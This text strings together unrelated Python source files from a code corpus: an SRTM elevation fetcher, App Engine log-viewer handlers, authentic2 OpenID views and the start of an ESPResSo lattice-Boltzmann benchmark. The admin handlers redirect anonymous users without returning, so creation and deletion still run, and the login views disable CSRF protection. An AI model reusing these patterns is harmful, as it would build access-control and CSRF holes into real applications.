'labels.tag': {
'Meta': {'db_table': "'cg_tag'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['channels']
| agpl-3.0 | 668,921,977,871,084,900 | 76.431953 | 177 | 0.539814 | false |
skdaccess/skdaccess | skdaccess/geo/srtm/cache/data_fetcher.py | 2 | 10677 | # The MIT License (MIT)
# Copyright (c) 2016 Massachusetts Institute of Technology
#
# Authors: Cody Rude, Guillaume Rongier
# This software has been created in projects supported by the US National
# Science Foundation and NASA (PI: Pankratius)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Scikit Data Access imports
from skdaccess.framework.data_class import DataFetcherCache, ImageWrapper
from skdaccess.utilities.support import convertToStr
from skdaccess.utilities.image_util import AffineGlobalCoords, convertBinCentersToEdges
# 3rd party imports
import pandas as pd
import numpy as np
import gdal
from pkg_resources import resource_filename
# Standard library imports
from collections import OrderedDict
from calendar import monthrange
from zipfile import ZipFile
import os
class DataFetcher(DataFetcherCache):
''' DataFetcher for retrieving data from the Shuttle Radar Topography Mission '''
def __init__(self, lat_tile_start, lat_tile_end, lon_tile_start, lon_tile_end,
username, password, arcsecond_sampling = 1, mask_water = True,
store_geolocation_grids=False):
'''
Initialize Data Fetcher
@param lat_tile_start: Latitude of the southwest corner of the starting tile
        @param lat_tile_end: Latitude of the southwest corner of the last tile
@param lon_tile_start: Longitude of the southwest corner of the starting tile
@param lon_tile_end: Longitude of the southwest corner of the last tile
@param username: NASA Earth Data username
@param password: NASA Earth Data Password
@param arcsecond_sampling: Sample spacing of the SRTM data, either 1 arc-
second or 3 arc-seconds
@param mask_water: True if the water bodies should be masked, false otherwise
@param store_geolocation_grids: Store grids of latitude and longitude in the metadata
'''
assert arcsecond_sampling == 1 or arcsecond_sampling == 3, "Sampling should be 1 or 3 arc-seconds"
self.lat_tile_start = lat_tile_start
self.lat_tile_end = lat_tile_end
self.lon_tile_start = lon_tile_start
self.lon_tile_end = lon_tile_end
self.username = username
self.password = password
self.arcsecond_sampling = arcsecond_sampling
self.mask_water = mask_water
self.store_geolocation_grids = store_geolocation_grids
self._missing_data_projection = '\n'.join([
'GEOGCS["WGS 84",',
' DATUM["WGS_1984",',
' SPHEROID["WGS 84",6378137,298.257223563,',
' AUTHORITY["EPSG","7030"]],',
' AUTHORITY["EPSG","6326"]],',
' PRIMEM["Greenwich",0,',
' AUTHORITY["EPSG","8901"]],',
' UNIT["degree",0.0174532925199433,',
' AUTHORITY["EPSG","9122"]],',
' AUTHORITY["EPSG","4326"]]'
])
super(DataFetcher, self).__init__()
def output(self):
'''
Generate SRTM data wrapper
@return SRTM Image Wrapper
'''
lat_tile_array = np.arange(self.lat_tile_start, self.lat_tile_end+1)
lon_tile_array = np.arange(self.lon_tile_start, self.lon_tile_end+1)
lat_grid,lon_grid = np.meshgrid(lat_tile_array, lon_tile_array)
lat_grid = lat_grid.ravel()
lon_grid = lon_grid.ravel()
filename_root = '.SRTMGL1.'
base_url = 'https://e4ftl01.cr.usgs.gov/MEASURES/'
folder_root = 'SRTMGL1.003/2000.02.11/'
if self.arcsecond_sampling == 3:
filename_root = '.SRTMGL3.'
folder_root = 'SRTMGL3.003/2000.02.11/'
base_url += folder_root
filename_list = []
for lat, lon in zip(lat_grid, lon_grid):
if lat < 0:
lat_label = 'S'
lat = np.abs(lat)
else:
lat_label = 'N'
if lon < 0:
lon_label = 'W'
lon = np.abs(lon)
else:
lon_label = 'E'
filename_list.append(lat_label + convertToStr(lat, 2) + lon_label + convertToStr(lon, 3) + filename_root + 'hgt.zip')
if self.mask_water == True:
filename_list.append(lat_label + convertToStr(lat, 2) + lon_label + convertToStr(lon, 3) + filename_root + 'num.zip')
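        # Example of the filenames built above (illustrative values): lat=27, lon=86 yields
        # 'N27E086.SRTMGL1.hgt.zip', plus 'N27E086.SRTMGL1.num.zip' when mask_water is True.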
# Read in list of available data
srtm_list_filename = 'srtm_gl1.txt'
if self.arcsecond_sampling == 3:
srtm_list_filename = 'srtm_gl3.txt'
srtm_support_filename = resource_filename('skdaccess', os.path.join('support',srtm_list_filename))
available_file_list = open(srtm_support_filename).readlines()
available_file_list = [filename.strip() for filename in available_file_list]
requested_files = pd.DataFrame({'Filename' : filename_list})
requested_files['Valid'] = [ '.'.join(filename.split('.')[0:-2]) in available_file_list for filename in filename_list ]
valid_filename_list = requested_files.loc[ requested_files['Valid']==True, 'Filename'].tolist()
url_list = [base_url + filename for filename in valid_filename_list]
downloaded_file_list = self.cacheData('srtm', url_list, self.username, self.password,
'https://urs.earthdata.nasa.gov')
requested_files.loc[ requested_files['Valid']==True, 'Full Path'] = downloaded_file_list
def getCoordinates(filename):
'''
            Determine the latitude and longitude of the lower left (southwest) corner of the tile from the input filename
            @param filename: Input SRTM filename
@return Latitude of southwest corner, Longitude of southwest corner
'''
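            # e.g. (illustrative): 'N27E086.SRTMGL1.hgt.zip' -> (27, 86), 'S34W071...' -> (-34, -71)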
lat_start = int(filename[1:3])
if filename[0] == 'S':
lat_start *= -1
lon_start = int(filename[4:7])
if filename[3] == 'W':
lon_start *= -1
return lat_start, lon_start
data_dict = OrderedDict()
metadata_dict = OrderedDict()
array_shape = (3601,3601)
if self.arcsecond_sampling == 3:
array_shape = (1201,1201)
file_slice = slice(None)
water_value = 0
if self.mask_water == True:
file_slice = slice(0, -1, 2)
water_value = np.nan
for i in requested_files.index[file_slice]:
hgt_full_path = requested_files.at[i, 'Full Path']
hgt_filename = requested_files.at[i, 'Filename']
label = hgt_filename[:7]
lat_start, lon_start = getCoordinates(hgt_filename)
metadata_dict[label] = OrderedDict()
x_res = 1.0 / (array_shape[0]-1)
y_res = 1.0 / (array_shape[1]-1)
extents = [
lon_start - x_res / 2,
lon_start + 1 + x_res / 2,
lat_start - y_res / 2,
lat_start + 1 + y_res / 2
]
if requested_files.at[i, 'Valid']:
masked_dem_data = np.ones(array_shape)
if self.mask_water == True and requested_files.at[i + 1, 'Valid']:
num_full_path = requested_files.at[i + 1, 'Full Path']
                    num_filename = requested_files.at[i + 1, 'Filename']
zipped_num_data = ZipFile(num_full_path)
zipped_num_full_path = zipped_num_data.infolist()[0].filename
num_data = np.frombuffer(zipped_num_data.open(zipped_num_full_path).read(),
np.dtype('uint8')).reshape(array_shape)
masked_dem_data[(num_data == 1) | (num_data == 2)] = water_value
i += 1
zipped_hgt_data = ZipFile(hgt_full_path)
dem_dataset = gdal.Open(hgt_full_path, gdal.GA_ReadOnly)
dem_data = dem_dataset.ReadAsArray()
masked_dem_data *= dem_data
metadata_dict[label]['WKT'] = dem_dataset.GetProjection()
metadata_dict[label]['GeoTransform'] = dem_dataset.GetGeoTransform()
else:
geo_transform = []
geo_transform.append(extents[0])
geo_transform.append(x_res)
geo_transform.append(0)
geo_transform.append(extents[-1])
geo_transform.append(0)
geo_transform.append(-y_res)
metadata_dict[label]['WKT'] = self._missing_data_projection
metadata_dict[label]['GeoTransform'] = geo_transform
masked_dem_data = np.full(shape=array_shape, fill_value=water_value)
i += 1
data_dict[label] = masked_dem_data
metadata_dict[label]['Geolocation'] = AffineGlobalCoords(metadata_dict[label]['GeoTransform'], center_pixels=True)
metadata_dict[label]['extents'] = extents
if self.store_geolocation_grids:
lat_coords, lon_coords = np.meshgrid(np.linspace(lat_start+1, lat_start, array_shape[0]),
np.linspace(lon_start, lon_start+1, array_shape[1]),
indexing = 'ij')
metadata_dict[label]['Latitude'] = lat_coords
metadata_dict[label]['Longitude'] = lon_coords
return ImageWrapper(obj_wrap = data_dict, meta_data = metadata_dict)
| mit | 6,060,677,398,640,232,000 | 39.290566 | 133 | 0.583966 | false |
labkode/rtlv | handlers.py | 1 | 6340 | from google.appengine.ext.db import BadValueError
from google.appengine.api import channel
from google.appengine.api import users
from google.appengine.ext import ndb
import webapp2
import jinja2
import os
import json
from datetime import datetime
import time
from models import Log
from models import System
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class MainHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
systems = System.query().fetch()
template_values = {"systems": systems, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/index.html")
self.response.write(template.render(template_values))
class SystemHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
system_param = self.request.get('system')
if not system_param:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "Please select a system"}
self.response.write(template.render(template_values))
return
system = System.get_by_id(system_param)
if system is None:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "The system #{0} not exists".format(system_param)}
self.response.write(template.render(template_values))
return
#logs = Log.query(ancestor = system.key).fetch()
logs = []
template_values = {"system":system, "logs": logs, "token": channel.create_channel(system.key.id()), "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/logs.html")
self.response.write(template.render(template_values))
return
class AdminSystemListHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
systems = System.query().fetch()
template_values = {"systems": systems, "message":{"type":"success", "payload":""},"user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminSystemCreateHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
template = JINJA_ENVIRONMENT.get_template("templates/create_system.html")
self.response.write(template.render({"user": user, "users": users}))
return
def post(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
system_name = self.request.get("name")
system_description = self.request.get("description")
system = System(id = system_name, description = system_description)
key = system.put()
        # This is correct but is a hack; another solution would be to use a sleep()
must_stop = False
systems = []
while not must_stop:
systems = System.query().fetch()
for system in systems:
if system.key.id() == system_name:
must_stop = True
systems = System.query().fetch()
template_values = {"systems": systems,"message":{"type":"success", "payload":"Created system #{0}".format(key.id())}, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminSystemDeleteHandler(webapp2.RequestHandler):
def post(self):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url())
system_id = self.request.get("system")
if not system_id:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "Please select a system"}
self.response.write(template.render(template_values))
return
sys = System.get_by_id(system_id)
if sys is None:
template = JINJA_ENVIRONMENT.get_template("templates/not_found.html")
template_values = {"user": user, "users": users, "not_found_msg": "The system #{0} not exists".format(system_id)}
self.response.write(template.render(template_values))
return
sys.key.delete()
        # Hack to avoid using a sleep()
found = True
systems = []
while found:
found = False
systems = System.query().fetch()
print(systems)
for system in systems:
print(system.key.id(),sys.key.id())
if system.key.id() == sys.key.id():
found = True
break
systems = System.query().fetch()
template_values = {"systems": systems, "message":{"type":"success", "payload":"Deleted system #{0}".format(system_id)}, "user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/list_system.html")
self.response.write(template.render(template_values))
return
class AdminLogHandler(webapp2.RequestHandler):
def post(self):
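        # The request body is JSON: either a single log object or a list of them.
        # Illustrative payload (field names match the parsing below, values are made up):
        #   {"system": "my-system", "id": "log-1", "level": "INFO", "msg": "hello", "ts": 1400000000}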
try:
log_param = json.loads(self.request.body)
except ValueError as e:
self.response.out.write(e)
self.response.set_status(400)
return
except:
self.response.set_status(500)
return
if not isinstance(log_param, list):
log_param = [log_param]
for log_item in log_param:
log_system = log_item.get("system")
if not log_system:
self.response.out.write("System not found")
self.response.set_status(404)
system = System.get_by_id(log_system)
if not system:
self.response.out.write("System not found")
self.response.set_status(404)
return
try:
log_key = ndb.Key("Log", log_item.get("id"), parent = system.key)
log_msg = log_item.get("msg")
log_level = log_item.get("level")
log_ts = log_item.get("ts")
log = Log(key = log_key, msg = log_msg, level = log_level, ts = log_ts)
# CHANNEL API
channel.send_message(system.key.id(), json.dumps(log.to_dict()))
except BadValueError as e:
self.response.out.write(e)
self.response.set_status(400)
return
return
class HelpHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
template_values = {"user": user, "users": users}
template = JINJA_ENVIRONMENT.get_template("templates/help.html")
self.response.write(template.render(template_values))
| agpl-3.0 | 5,098,910,542,018,449,000 | 29.926829 | 151 | 0.699211 | false |
incuna/authentic | authentic2/auth2_auth/auth2_openid/views.py | 1 | 17205 | import urllib
from django_authopenid.forms import OpenidDissociateForm, AssociateOpenID
from django_authopenid.forms import OpenidSigninForm
from django_authopenid import DjangoOpenIDStore
from django_authopenid.models import UserAssociation
from django_authopenid.utils import *
from django_authopenid.views import associate_failure, complete
from django_authopenid.views import _build_context, signin_failure, not_authenticated
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME, login
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.encoding import smart_unicode
from django.views.decorators.csrf import csrf_exempt, csrf_protect
from django.views.generic.simple import redirect_to
from django.contrib import messages
from openid.consumer.consumer import Consumer, SUCCESS, CANCEL, FAILURE, SETUP_NEEDED
from openid.consumer.discover import DiscoveryFailure
from openid.yadis import xri
from authentic2.auth2_auth.auth2_openid import *
OPENID_PROVIDER = ['https://me.yahoo.com//','http://openid.aol.com/','http://.myopenid.com/',
    'http://.livejournal.com/','http://www.flickr.com/photos//','http://.wordpress.com/',
    'http://.blogspot.com/','http://.pip.verisignlabs.com/','http://.myvidoop.com/',
    'http://.pip.verisignlabs.com/','http://claimid.com/']
def signin_success(request, identity_url, openid_response,
redirect_field_name=REDIRECT_FIELD_NAME, **kwargs):
"""
openid signin success.
If the openid is already registered, the user is redirected to
url set par next or in settings with OPENID_REDIRECT_NEXT variable.
If none of these urls are set user is redirectd to /.
if openid isn't registered user is redirected to register page.
"""
openid_ = from_openid_response(openid_response)
openids = request.session.get('openids', [])
openids.append(openid_)
request.session['openids'] = openids
request.session['openid'] = openid_
redirect_to = request.REQUEST.get(redirect_field_name, '')
try:
rel = UserAssociation.objects.get(openid_url__exact = str(openid_))
except:
# try to register this new user
if not redirect_to: # or '//' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
params = urllib.urlencode({ redirect_field_name: redirect_to })
redirect_to = "%s?%s" % (reverse('user_register'), params)
return HttpResponseRedirect(redirect_to)
user_ = rel.user
if user_.is_active:
user_.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user_)
if not redirect_to: # or '//' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
return HttpResponseRedirect(redirect_to)
def mycomplete(request, on_success=None, on_failure=None, return_to=None,
**kwargs):
on_success = on_success or default_on_success
on_failure = on_failure or default_on_failure
consumer = Consumer(request.session, DjangoOpenIDStore())
# make sure params are encoded in utf8
params = dict((k,smart_unicode(v)) for k, v in request.GET.items())
openid_response = consumer.complete(params, return_to)
if not hasattr(request.GET,'openid.identity'):
_openid_url = 'None'
else:
_openid_url = request.GET['openid.identity']
if openid_response.status == SUCCESS:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'success')
return on_success(request, openid_response.identity_url,
openid_response, **kwargs)
elif openid_response.status == CANCEL:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'cancel')
return on_failure(request, 'The request was canceled', **kwargs)
elif openid_response.status == FAILURE:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'failure')
return on_failure(request, openid_response.message, **kwargs)
elif openid_response.status == SETUP_NEEDED:
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'setup_needed')
return on_failure(request, 'Setup needed', **kwargs)
else:
assert False, "Bad openid status: %s" % openid_response.status
@csrf_exempt
def complete_signin(request, redirect_field_name=REDIRECT_FIELD_NAME,
openid_form=OpenidSigninForm, auth_form=AuthenticationForm,
on_success=signin_success, on_failure=signin_failure,
extra_context=None):
_openid_form = openid_form
_auth_form = auth_form
_extra_context = extra_context
return mycomplete(request, on_success, on_failure,
get_url_host(request) + reverse('user_complete_signin'),
redirect_field_name=redirect_field_name, openid_form=_openid_form,
auth_form=_auth_form, extra_context=_extra_context)
def ask_openid(request, openid_url, redirect_to, on_failure=None):
on_failure = on_failure or signin_failure
sreg_req = None
ax_req = None
_openid_url = openid_url
trust_root = getattr(
settings, 'OPENID_TRUST_ROOT', get_url_host(request) + '/'
)
if xri.identifierScheme(openid_url) == 'XRI' and getattr(
settings, 'OPENID_DISALLOW_INAMES', False
):
msg = ("i-names are not supported")
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'not_supported')
return on_failure(request, msg)
consumer = Consumer(request.session, DjangoOpenIDStore())
try:
auth_request = consumer.begin(openid_url)
except DiscoveryFailure:
msg = ("The OpenID %s was invalid") % openid_url
auth_oidlogin.send(sender = None, openid_url = _openid_url, state = 'invalid')
return on_failure(request, msg)
# get capabilities
use_ax, use_sreg = discover_extensions(openid_url)
if use_sreg:
# set sreg extension
# we always ask for nickname and email
sreg_attrs = getattr(settings, 'OPENID_SREG', {})
sreg_attrs.update({ "optional": ['nickname', 'email'] })
sreg_req = sreg.SRegRequest(**sreg_attrs)
if use_ax:
# set ax extension
# we always ask for nickname and email
ax_req = ax.FetchRequest()
ax_req.add(ax.AttrInfo('http://schema.openid.net/contact/email',
alias='email', required=True))
ax_req.add(ax.AttrInfo('http://schema.openid.net/namePerson/friendly',
alias='nickname', required=True))
# add custom ax attrs
ax_attrs = getattr(settings, 'OPENID_AX', [])
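        # Illustrative shape of the OPENID_AX setting (values made up): 1- or 2-tuples of
        # (AX type URI, required flag), e.g. [('http://axschema.org/namePerson', True)]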
for attr in ax_attrs:
if len(attr) == 2:
                ax_req.add(ax.AttrInfo(attr[0], required=attr[1]))
else:
ax_req.add(ax.AttrInfo(attr[0]))
if sreg_req is not None:
auth_request.addExtension(sreg_req)
if ax_req is not None:
auth_request.addExtension(ax_req)
redirect_url = auth_request.redirectURL(trust_root, redirect_to)
return HttpResponseRedirect(redirect_url)
@csrf_exempt
@not_authenticated
def signin(request, template_name='authopenid/signin.html',
redirect_field_name=REDIRECT_FIELD_NAME, openid_form=OpenidSigninForm,
auth_form=AuthenticationForm, on_failure=None, extra_context=None):
if on_failure is None:
on_failure = signin_failure
redirect_to = request.REQUEST.get(redirect_field_name, '')
form1 = openid_form()
form2 = auth_form()
if request.POST:
if not redirect_to or '://' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
if 'openid_url' in request.POST.keys():
form1 = openid_form(data=request.POST)
if form1.is_valid():
redirect_url = "%s%s?%s" % (
get_url_host(request),
reverse('user_complete_signin'),
urllib.urlencode({ redirect_field_name: redirect_to })
)
return ask_openid(request,
form1.cleaned_data['openid_url'],
redirect_url,
on_failure=on_failure)
else:
# perform normal django authentification
form2 = auth_form(data=request.POST)
if form2.is_valid():
login(request, form2.get_user())
if request.session.test_cookie_worked():
request.session.delete_test_cookie()
return HttpResponseRedirect(redirect_to)
return render_to_response(template_name, {
'form1': form1,
'form2': form2,
redirect_field_name: redirect_to,
'msg': request.GET.get('msg','')
}, context_instance=_build_context(request, extra_context=extra_context))
@csrf_exempt
@login_required
def dissociate(request, template_name="authopenid/dissociate.html",
dissociate_form=OpenidDissociateForm,
redirect_field_name=REDIRECT_FIELD_NAME,
default_redirect=settings.LOGIN_REDIRECT_URL, extra_context=None):
""" view used to dissociate an openid from an account """
nb_associated_openids, associated_openids = get_associate_openid(request.user)
if nb_associated_openids == 1 and not request.user.has_usable_password() and request.method != 'GET':
msg = ["You can't remove this openid, you should set a password first."]
return render_to_response("authopenid/associate.html",{
'associated_openids' : associated_openids ,
'nb_associated_openids':nb_associated_openids,
'msg': msg},
context_instance = RequestContext(request)
)
if request.POST:
if request.POST.get('bdissociate_cancel','') == 'Cancel':
            msg = ['Operation cancelled.']
return redirect_to(request,'/accounts/openid/associate/')
openid_urls = request.POST.getlist('a_openids_remove')
if len(openid_urls) >= 1:
for openid_url in openid_urls:
UserAssociation.objects.get(openid_url__exact=openid_url).delete()
if openid_url == request.session.get('openid_url'):
del request.session['openid_url']
msg = "Openid removed."
request.user.message_set.create(message = msg)
return redirect_to(request,'/accounts/openid/associate')
else:
return redirect_to(request, '/accounts/openid/associate')
@login_required
def associate(request, template_name='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_field_name='/',
on_failure=associate_failure, extra_context=None):
nb_associated_openids, associated_openids = get_associate_openid(request.user)
redirect_to = request.REQUEST.get(redirect_field_name, '')
if request.POST:
if 'a_openids' in request.POST.keys():
a_openids = []
            if request.POST.get('a_openids','') != '':
a_openids = request.POST.getlist('a_openids')
if len(a_openids) == nb_associated_openids and not request.user.has_usable_password():
if len(a_openids) > 1:
msg = ["You can't remove these openids, You should set a password first."]
else:
msg = ["You can't remove this openid, You should set a password first."]
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
return render_to_response("authopenid/dissociate.html",{
'a_openids' : a_openids },
context_instance = RequestContext(request)
)
else:
form = openid_form(request.user, data=request.POST)
if form.is_valid():
if ' ' in form.cleaned_data['openid_url'] or form.cleaned_data['openid_url'] in OPENID_PROVIDER:
msg = ['You must enter a valid OpenID url']
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
if not redirect_to or '://' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
redirect_url = "%s%s?%s" % (
get_url_host(request),
reverse('user_complete_myassociate'),
urllib.urlencode({ redirect_field_name: redirect_to })
)
return ask_openid(request,
form.cleaned_data['openid_url'],
redirect_url,
on_failure=on_failure)
else:
msg = ['You must enter a valid OpenID url']
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
else:
form = openid_form(request.user)
msg = messages.get_messages(request)
return render_to_response('authopenid/associate.html', {
'form': form,
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
@login_required
def associate_success(request, identity_url, openid_response,
redirect_field_name=REDIRECT_FIELD_NAME, send_email=True, **kwargs):
openid_ = from_openid_response(openid_response)
openids = request.session.get('openids', [])
openids.append(openid_)
request.session['openids'] = openids
uassoc = UserAssociation(
openid_url=str(openid_),
user_id=request.user.id
)
uassoc.save(send_email=send_email)
redirect_to = '/accounts/openid/associate'
nb_associated_openids, associated_openids = get_associate_openid(request.user)
msg = ["Your Openid has been added"]
return render_to_response("authopenid/associate.html",{
'associated_openids' : associated_openids ,
'nb_associated_openids':nb_associated_openids,
'msg': msg},
context_instance = RequestContext(request)
)
@csrf_exempt
@login_required
def complete_associate(request, redirect_field_name=REDIRECT_FIELD_NAME,
template_failure='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_name=None,
on_success=associate_success, on_failure=associate_failure,
send_email=True, extra_context=None):
if request.method == 'GET':
return mycomplete(request, on_success, on_failure,
get_url_host(request) + reverse('user_complete_myassociate'),
redirect_field_name=redirect_field_name, openid_form=openid_form,
template_failure=template_failure, redirect_name=redirect_name,
send_email=send_email, extra_context=extra_context)
else:
return associate(request, template_name='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_field_name='/',
on_failure=associate_failure, extra_context=None)
def get_associate_openid(user):
""" get list of associated openids """
rels = UserAssociation.objects.filter(user=user)
associated_openids = [rel.openid_url for rel in rels]
nb_associated_openids = len(associated_openids)
return nb_associated_openids, associated_openids
def openid_profile(request, next, template_name='auth/openid_profile.html'):
nb, associated_openids = get_associate_openid(request.user)
return render_to_string(template_name,
{ 'idp_openid': getattr(settings, 'IDP_OPENID', False),
'associated_openids': associated_openids},
RequestContext(request))
| agpl-3.0 | -8,868,549,658,912,582,000 | 45.25 | 112 | 0.626271 | false |
espressomd/espresso | maintainer/benchmarks/lb.py | 1 | 6553 | #
# Copyright (C) 2013-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Benchmark Lattice-Boltzmann fluid + Lennard-Jones particles
"""
import os
import sys
import numpy as np
from time import time
import argparse
parser = argparse.ArgumentParser(description="Benchmark LB simulations. "
"Save the results to a CSV file.")
parser.add_argument("--particles_per_core", metavar="N", action="store",
type=int, default=125, required=False,
help="Number of particles in the simulation box")
parser.add_argument("--lb_sites_per_particle", metavar="N_LB", action="store",
type=float, default=28, required=False,
help="Number of particles in the simulation box")
parser.add_argument("--volume_fraction", metavar="FRAC", action="store",
type=float, default=0.03, required=False,
help="Fraction of the simulation box volume occupied by "
"particles (range: [0.01-0.74], default: 0.50)")
group = parser.add_mutually_exclusive_group()
group.add_argument("--output", metavar="FILEPATH", action="store",
type=str, required=False, default="benchmarks.csv",
help="Output file (default: benchmarks.csv)")
args = parser.parse_args()
# process and check arguments
n_iterations = 30
assert args.volume_fraction > 0, "volume_fraction must be a positive number"
assert args.volume_fraction < np.pi / (3 * np.sqrt(2)), \
"volume_fraction exceeds the physical limit of sphere packing (~0.74)"
import espressomd
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
# System
#############################################################
system = espressomd.System(box_l=[1, 1, 1])
# Interaction parameters (Lennard-Jones)
#############################################################
lj_eps = 1.0 # LJ epsilon
lj_sig = 1.0 # particle diameter
lj_cut = lj_sig * 2**(1. / 6.) # cutoff distance
# System parameters
#############################################################
n_proc = system.cell_system.get_state()['n_nodes']
n_part = n_proc * args.particles_per_core
# volume of N spheres with radius r: N * (4/3*pi*r^3)
box_l = (n_part * 4. / 3. * np.pi * (lj_sig / 2.)**3
/ args.volume_fraction)**(1. / 3.)
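# Illustrative order of magnitude: with the defaults (125 particles on a single core,
# volume_fraction=0.03) this gives box_l = (125 * 0.5236 / 0.03)**(1. / 3.), roughly 13 lj_sig.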
lb_grid = int((round(n_part * args.lb_sites_per_particle)**(1. / 3)))
agrid = box_l / lb_grid
measurement_steps = int(max(120**3 / lb_grid**3, 50))
# System
#############################################################
system.box_l = 3 * (box_l,)
# PRNG seeds
#############################################################
# np.random.seed(1)
# Integration parameters
#############################################################
system.time_step = 0.01
system.cell_system.skin = 0.5
system.thermostat.turn_off()
#############################################################
# Setup System #
#############################################################
# Interaction setup
#############################################################
system.non_bonded_inter[0, 0].lennard_jones.set_params(
epsilon=lj_eps, sigma=lj_sig, cutoff=lj_cut, shift="auto")
# Particle setup
#############################################################
# Warmup Integration #
#############################################################
system.integrator.set_steepest_descent(
f_max=0,
gamma=0.001,
max_displacement=0.01)
# warmup
while system.analysis.energy()["total"] > 0.1 * n_part:
print("minimization: {:.1f}".format(system.analysis.energy()["total"]))
system.integrator.run(20)
print("minimization: {:.1f}".format(system.analysis.energy()["total"]))
print()
system.integrator.set_vv()
system.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)
# tuning and equilibration
print("Tune skin: {}".format(system.cell_system.tune_skin(
min_skin=0.2, max_skin=1, tol=0.05, int_steps=100)))
system.integrator.run(500)
print("Tune skin: {}".format(system.cell_system.tune_skin(
min_skin=0.2, max_skin=1, tol=0.05, int_steps=100)))
system.integrator.run(500)
system.thermostat.turn_off()
print("lb sites", lb_grid, "agrid", agrid)
if "LBFluid" in dir(espressomd.lb):
LBClass = espressomd.lb.LBFluid
elif "LBFluidWalberla" in dir(espressomd.lb):
LBClass = espressomd.lb.LBFluidWalberla
else:
raise Exception("LB not built in")
lbf = LBClass(agrid=agrid, dens=1, visc=1, tau=system.time_step, kT=1, seed=1)
system.actors.add(lbf)
print("lb shape", lbf.shape)
system.thermostat.set_lb(gamma=10, LB_fluid=lbf, seed=2)
# time integration loop
print("Timing every {} steps".format(measurement_steps))
main_tick = time()
all_t = []
for i in range(n_iterations):
tick = time()
system.integrator.run(measurement_steps)
tock = time()
t = (tock - tick) / measurement_steps
